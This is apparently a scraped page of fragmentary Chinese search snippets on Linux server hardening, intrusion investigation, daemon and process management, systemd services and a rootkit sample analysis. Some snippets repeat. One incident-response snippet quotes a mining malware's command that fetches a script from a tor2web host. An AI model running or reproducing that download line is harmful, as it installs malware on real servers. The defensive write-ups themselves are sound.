1、删除特殊的账户和账户组 Linux提供了各种不同角色的系统账号,在系统安装完成后,默认会安装很多不必要的用户和用户组,如果不需要某些用户或者组,就要立即删除它,因为账户越多,系统就越不安全,很可能被黑客利用...2、关闭系统不需要的服务 Linux在安装完成后,绑定了很多没用的服务,这些服务默认都是自动启动的。...5、删减系统登录欢迎信息 系统的一些欢迎信息或版本信息,虽然能给系统管理者带来一定的方便,但是这些信息有时候可能被黑客利用,成为攻击服务器的帮凶,为了保证系统的安全,可以修改或删除某些系统文件,需要修改或删除的文件有.../dev/shm是Linux下的一个共享内存设备,在Linux启动的时候系统默认会加载/dev/shm,被加载的/dev/shm使用的是tmpfs文件系统,而tmpfs是一个内存文件系统,存储到tmpfs...chkrootkit在检查rootkit的过程中使用了部分系统命令,因此,如果服务器被黑客入侵,那么依赖的系统命令可能也已经被入侵者替换,此时chkrootkit的检测结果将变得完全不可信。
命令:netstat -unltp 3.通常异常进程都比较消耗资源,比如挖矿脚本最消耗资源,查看哪个进程消耗资源做多 命令:top 4.如果找到怀疑的进程,找到pid号,可以看到启动命令 ll /proc...和其它机器对比,找出有问题的进程,基本上系统启动后就那几个进程,再加上服务器运行的服务,进程数量相对比较固定。 命令:ps -aux 2.找到有问题的pid号后,查看相关进程,一起kill掉杀死。...-U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh 3.显示如下,先判断/tmp/.X11-lock所记录的pid是否存在,不存在将下载一个可执行文件,加权限后并启动...4.nginx或者其他服务均使用单独的用户启动,并nologin消除登陆权限。 5.更改暴露在外面的服务器22端口改成别的,并禁止root直接登陆。...6.做好服务器定期镜像,因为被入侵后恢复很痛苦,最好的方法是直接还原镜像
也有可能开放的服务,例如nginx,mysql或者redis(默认没有密码),因为某些漏洞,从而被黑客进入到系统之中。...被入侵后如果还有潜伏程序,将会有如下特征 1.启动一个程序一直运行,进行破坏或者收集信息 2.在周计划中添加条目,每隔几秒就运行一下 3.在/etc/profile等启动执行文件里添加条目 二.排查 入侵排查...登录系统去看下是否有其它人陌生人也在线上 命令: w 如果有就找到pid号,kill掉,并立即更改服务器密码。...命令:crontab -e命令:cat /etc/crontab 如果这里删除后过一会又有了,利用lsof命令查找一下是哪个进程在写入文件。...这时候可以用audit这个命令来监控/var/spool/cron/root这个文件,看是哪个进程在操作。 筛选日志 查看机器的日志有没有被清空或删除。和别的机器对比一下,看看是不是文件都在。
这篇文章主要为大家详细介绍了Linux守护进程的启动方法,本文介绍如何将一个 Web 应用,启动为守护进程,感兴趣的小伙伴们可以参考一下 "守护进程"(daemon)就是一直在后台运行的进程(daemon...怎么才能让它变成系统的守护进程(daemon),成为一种服务(service),一直在那里运行呢? 二、前台任务与后台任务 上面这样启动的脚本,称为"前台任务"(foreground job)。...变成守护进程的第一步,就是把它改成"后台任务"(background job)。 $ node server.js & 只要在命令的尾部加上符号&,启动的进程就会成为"后台任务"。...三、SIGHUP信号 变为"后台任务"后,一个进程是否就成为了守护进程呢?或者说,用户退出 session 以后,"后台任务"是否还会继续执行? Linux系统是这样设计的。...四、disown 命令 通过"后台任务"启动"守护进程"并不保险,因为有的系统的huponexit参数可能是打开的(on)。 更保险的方法是使用disown命令。
"守护进程"(daemon)就是一直在后台运行的进程(daemon)。 本文介绍如何将一个 Web 应用,启动为守护进程。 一、问题的由来 Web应用写好后,下一件事就是启动,让它一直在后台运行。...变成守护进程的第一步,就是把它改成"后台任务"(background job)。 $ node server.js & 只要在命令的尾部加上符号&,启动的进程就会成为"后台任务"。...三、SIGHUP信号 变为"后台任务"后,一个进程是否就成为了守护进程呢?或者说,用户退出 session 以后,"后台任务"是否还会继续执行? Linux系统是这样设计的。...# 作为前台任务启动 $ forever server.js # 作为服务进程启动 $ forever start app.js # 停止服务进程 $ forever stop Id # 重启服务进程...://localhost:9615 $ pm2 web 十、Systemd 除了专用工具以外,Linux系统有自己的守护进程管理工具 Systemd 。
Linux 守护进程的启动方法 “守护进程”(daemon)就是一直在后台运行的进程(daemon)。 本文介绍如何将一个 Web 应用,启动为守护进程。...变成守护进程的第一步,就是把它改成”后台任务”(background job)。 $ node server.js & 只要在命令的尾部加上符号&,启动的进程就会成为”后台任务”。...三、SIGHUP信号 变为”后台任务”后,一个进程是否就成为了守护进程呢?或者说,用户退出 session 以后,”后台任务”是否还会继续执行? Linux系统是这样设计的。...# 作为前台任务启动 $ forever server.js # 作为服务进程启动 $ forever start app.js # 停止服务进程 $ forever stop Id # 重启服务进程...://localhost:9615 $ pm2 web 十、Systemd 除了专用工具以外,Linux系统有自己的守护进程管理工具 Systemd 。
S 13:02 0:00 \_ /usr/sbin/httpd 我们查看httpd 服务器的进程;您也可以用pgrep -l httpd 来查看; 我们看上面例子中的第二列,就是进程PID的列,其中4830...是httpd服务器的父进程,从4833-4840的进程都是它4830的子进程;如果我们杀掉父进程4830的话,其下的子进程也会跟着死掉; [root@localhost ~]# kill 4840 注:...是不是httpd服务器仍在运行?...[root@localhost ~]# kill 4830 注:杀掉httpd的父进程; [root@localhost ~]# ps -aux |grep httpd 注:查看httpd的其它子进程是否存在...,httpd服务器是否仍在运行?
随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考 背景信息:以下情况是在CentOS...6.9的系统中查看的,其它Linux发行版类似 1.入侵者可能会删除机器的日志信息,可以查看日志信息是否还存在或者是否被清空,相关命令示例: [<a href="/cdn-cgi/l/email-protection...所以lsof 可以显示<em>进程</em>的文件描述符和相关的文件名等信息。也就是我们通过访问<em>进程</em>的文件描述符可以找到该文件的相关信息。...03:28:25 hlmcen69n3 sshd[13292]: Received disconnect from 51.15.64.137: 11: Bye Bye 总结 以上所述是小编给大家介绍的<em>Linux</em>...<em>服务器</em><em>被黑</em>以后的详细处理步骤,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。
前言 疫情还没有结束,放假只能猫家里继续分析和研究最新的攻击技术和样本了,正好前段时间群里有人说服务器被黑,然后扔了个样本在群里,今天咱就拿这个样本开刀,给大家研究一下这个样本究竟是个啥,顺便也给大家分享一些关于...& f0rb1dd3分享的Linux RootKit高级技术,加载执行Linux Rootkit木马,如下所示: 2.解密Linux RootKit木马数据过程,如下所示: 3.Linux RootKit...Linux RootKit木马,发现是Reptile木马源代码修改的,如下所示: 7.Reptile是一款开源的Linux RootKit木马程序,Linux RootKit木马功能非常强大,如下所示...,如下所示: 笔者曾研究过多个基于Linux平台的RootKit家族样本,说不定你的服务器上就被安装了这些RootKit家族样本,RootKit包含应用层和驱动层,应用层主要使用的技术就是二次打包修改...、替换常用二进制文件、LD_PRELOAD环境变量写入/etc/ld.so/preload、捆绑合并等方式,驱动层主要使用的syscall hook以及最近两三年比较流行的通过eBPF技术来实现文件,进程
摘要:这次我们来谈谈如何采集一个进程的启动时间 以下内容使用go语言实现 linux 进程启动时间采集 方法一 直接读取/proc/{pid} 文件夹的时间戳方式(不准确但效率高),以下是方法一的代码,...= nil { return nil } proc.mtime = stat.ModTime().Unix() 方法二 使用(现在的时间-从系统启动到现在的时间) + 进程启动时距离系统启动时的时间间隔得到...import "C" import ( "fmt" "io/ioutil" "strconv" "strings" "time" ) var ( Uptime int64 // 系统启动时间戳...启动时,内核将该变量初始化为0,此后,每次时钟中断处理程序都会增加该变量的值。一秒内时钟中断的次数等于Hz,所以jiffies一秒内增加的值也就是Hz。...输出结果 [输出结果] 引用 go 获得进程启动时间的两种方法
杀进程 使用kill命令结束进程:kill xxx 常用:kill -9 324 Linux下还提供了一个killall命令,可以直接使用进程的名字而不是进程标识号,例如:# killall -9 NAME...显示进程 命令:ps 格式:ps [option] 功能:显示系统中进程的信息。包括进程ID、控制进程终端、执行时间和命令。...用户名: 对锁定的用户帐号进行解锁 passwd –d 用户名: 使帐号无口令,即用户不需要口令就能登录系统 例:#usermod -l user2 user1 //把用户user2改名为user1 启动...VSFTP服务 即时启动:/etc/init.d/vsftpd start 即时停止:/etc/init.d/vsftpd stop 开机默认VSFTP服务自动启动: 方法一:(常用\方便) [root...etc]# chkconfig vsftpd on (执行ON设置) 方法二: 修改文件 /etc/rc.local , 把行/usr/local/sbin/vsftpd & 插入文件中,以实现开机自动启动
我用 java -jar 的方式启动了一个服务,然后要关闭这个服务 / 进程。 1. ps -aux 查看当前进程,整个列表最 后一列 COMMAND 会显示出启动服务的命令,如下图红框中部分。...蓝框中是进程 Pid。 2. 找到要关闭的服务进程。我要关闭 jenkins 这个服务,如下图黄框中行。 3. 杀死进程,执行命令: kill -9 要关闭服务的PID。
有这样一个场景,在一台服务器上,我们想要启动一个简单的网络文件服务器,用来提供给内网的用户下载。...这里,我们使用ruby启动一个服务 使用ruby -run -ehttpd /home/webbuild/easy_file_server/ -p8000启动文件服务器 使用ruby -run -ehttpd.../home/webbuild/easy_file_server/ -p8000 & 将该进程设置为后台执行 为了防止挂起,我们还需要使用nohup处理。...但是还有一些问题,比如 进程意外停止了,无法自动启动 服务器重启,该进程也不会自动启动 那么我们有没有什么好的办法解决呢,答案是有的。就是下面介绍的使用systemd创建Linux 服务的方式解决。...其他字段解释 StartLimitIntervalSec 启动频率限制,设置为0 Restart=always 当进程退出后自动重启 RestartSec 重启延迟时间,单位为毫秒 WantedBy 自动启动相关参数
场景: 周一上班centos服务器ssh不可用,web和数据库等应用不响应。...好在vnc可以登录 使用last命令查询,2号之前的登录信息已被清空,并且sshd文件在周六晚上被修改,周日晚上2点服务器被人远程重启 使用less /var/log/messages命令2点结合last...命令,判断2点重启后IPATABLES生效,有大量的ssh暴力破解的扫描信息,由于机器是测试环境,上面安装了ORACLE和squid,临时管理了iptables,重启后iptables启动,应该没有再次被再次登录...a 即append,设定该参数后,只能向文件中添加数据,而不能删除,多用于服务器日志文件安全,只有root才能设定这个属性 使用 chattr -ia /usr/sbin/sshd修改文件的隐藏属性,取消对应设置之后删除成功
ldap这种原始的服务器搭建起来比较复杂,同时它也是CE必考的(客户端的搭建)。...,pres,sub database monitor access to * by dn.exact=”cn=Manager,dc=example,dc=com” read by * none 7、重启动...ldap服务器: 8、创建ldap用户目录: 9、编辑一个自动创建ldap用户的脚本: 10 、执行此脚本添加用户: 11、把ldap用户,组分别导出来,到一个文件中:(例子只做了组)用户在、/
Linux下的env命令可以在进程启动前修改其环境变量。 0. 命令格式 env [OPTION]... [-] [NAME=VALUE]... [COMMAND [ARG]...] 1.
Linux 服务器正常启动后,提供服务时会调用程序,占用进程。这时候我们如何查看系统中有哪些进程在被调用呢?我们可以通过以下命令来查看。...第一行内容依次表示当前时间、系统启动的时间、当前系统登录的用户数、平均负载。第二行依次显示的是所有启动的、目前运行的、挂起(Sleeping)的和无用(Zombie)的进程。...COMMAND:进程启动的启动命令名称,如果这一行显示不下,在进程中会有一个完整的命令行。 在 top 命令使用过程中,还可以使用一些交互的命令来完成其他参数的功能。...kill 命令的工作原理是,向 Linux 系统的内核发送一个系统操作信号和某个程序的进程标志号,然后系统内核就可以对进程标志号指定的进程进行操作了。...在 Linux 下,最强大的进程管理命令莫过于 ps 和 top 了,我们应该掌握它们的详细语法,在工作中灵活地使用它们。 注:以上内容整理自《构建高可用的 Linux 服务器》一书。
#./configure –prefix=/usr/local/ice/mcpp CFLAGS=-fPIC -enable-mcpplib -disable-s...
随着时间的推移,我们可能会在服务器装各种东西,然后执行各种shell脚本,有些必须启动起来才可以,万一哪天服务器需要重启,若是我们在一个个的启动服务,就太费时间啦,因此我们需要将服务加入到自动启动中。
问题提出 有的时候想重启一个服务,但是不知道启动命令在哪,这就很尴尬,如果能通过进程ID反推到启动的脚本位置,那就很舒服了,结果还真能 复现 我们以重启redis为例,首先要找到服务的进程号 ps -ef...| grep redis 此时我们知道redis的进程ID,然后根据进程ID反查启动脚本的位置,如下图所示, ls -l /proc/44446 总结 ls -l /proc/pid ls -l.../proc/44446 参考 linux怎么启动程序路径,linux查找启动程序的路径
领取专属 10元无门槛券
手把手带您无忧上云